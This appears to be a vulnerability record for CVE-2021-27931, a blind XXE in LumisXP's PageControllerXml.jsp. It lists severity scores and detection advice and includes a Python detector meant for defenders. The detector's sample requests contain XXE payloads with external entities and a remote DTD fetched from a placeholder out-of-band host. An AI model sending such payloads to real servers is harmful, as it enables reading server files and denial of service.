CVE-2021-27931
published 2021-03-03


Priority: P1 · 82 · critical · 9.1 (CVSS 3.1)
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 18.61% (96.9th percentile)
LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XXE via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service.

Affected

1 range

Vendor    Product                     Version range   Fixed in
lumis     lumis_experience_platform   < 10.0.0        10.0.0

Detection & IOCs (extracted from sources)

URL: PageControllerXml.jsp
  • Detect unauthenticated POST/GET requests targeting the endpoint PageControllerXml.jsp, particularly those containing an XXE payload (DOCTYPE declaration with ENTITY referencing external or internal resources).
  • Use interactsh/OOB HTTP callback detection to confirm blind XXE exploitation — a successful exploit triggers an outbound HTTP interaction from the server.
  • The XXE is blind — direct response-based detection is insufficient. OOB (out-of-band) interaction monitoring (e.g., via interactsh or DNS/HTTP callback infrastructure) is required to confirm exploitation.
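As an added example (not part of this vulnerability record or of the vendor's code), a small Python detector that applies the first and third bullets above to constructed request records: it flags requests to PageControllerXml.jsp whose body declares an external entity, and extracts the referenced URIs so they can be correlated with egress DNS/HTTP logs, which is the only way to confirm a blind XXE. The request path prefix, the sample bodies and the oob.example host are assumptions.

```python
import re

# Constructed sample request records (method, path, body) for this demonstration;
# in practice these would come from a WAF, reverse-proxy or application log.
SAMPLE_REQUESTS = [
    ("POST", "/lumis/api/PageControllerXml.jsp",
     '<?xml version="1.0"?><!DOCTYPE d [<!ENTITY x SYSTEM "http://oob.example/p">]><r>&x;</r>'),
    ("POST", "/lumis/api/PageControllerXml.jsp",
     '<?xml version="1.0"?><request><page>home</page></request>'),
    ("GET", "/lumis/portal/home.jsp", ""),
    ("POST", "/lumis/api/PageControllerXml.jsp",
     '<!DOCTYPE r [<!ENTITY % p SYSTEM "http://oob.example/x.dtd"> %p;]><r/>'),
]

ENDPOINT_RE = re.compile(r"PageControllerXml\.jsp", re.IGNORECASE)
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# Entity (or parameter entity, "%") declared with an external identifier; the final quoted URI is captured.
EXT_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?:%\s*)?\w+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s*"([^"]*)"', re.IGNORECASE)


def external_refs(body):
    """URIs referenced by external entity declarations in an XML body (empty list if none)."""
    return EXT_ENTITY_RE.findall(body)


def is_xxe_attempt(method, path, body):
    """True when the request targets the endpoint AND carries a DOCTYPE with an external entity.
    A DOCTYPE alone is a weak signal, so both conditions are required here to limit noise."""
    return (bool(ENDPOINT_RE.search(path))
            and bool(DOCTYPE_RE.search(body))
            and bool(external_refs(body)))


def flag_requests(requests):
    """Return (index, external URIs) for every flagged request.
    The URIs are what a defender correlates against outbound DNS/HTTP logs: because the
    XXE is blind, the HTTP response alone does not show whether the entity was resolved."""
    return [(i, external_refs(b))
            for i, (m, p, b) in enumerate(requests) if is_xxe_attempt(m, p, b)]


if __name__ == "__main__":
    for idx, refs in flag_requests(SAMPLE_REQUESTS):
        print(f"request #{idx}: possible XXE, external refs to check in egress logs: {refs}")
```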

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.1     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
nvd         v2.0      6.4     MEDIUM     AV:N/AC:L/Au:N/C:P/I:N/A:P
vulncheck   —         9.1     CRITICAL   —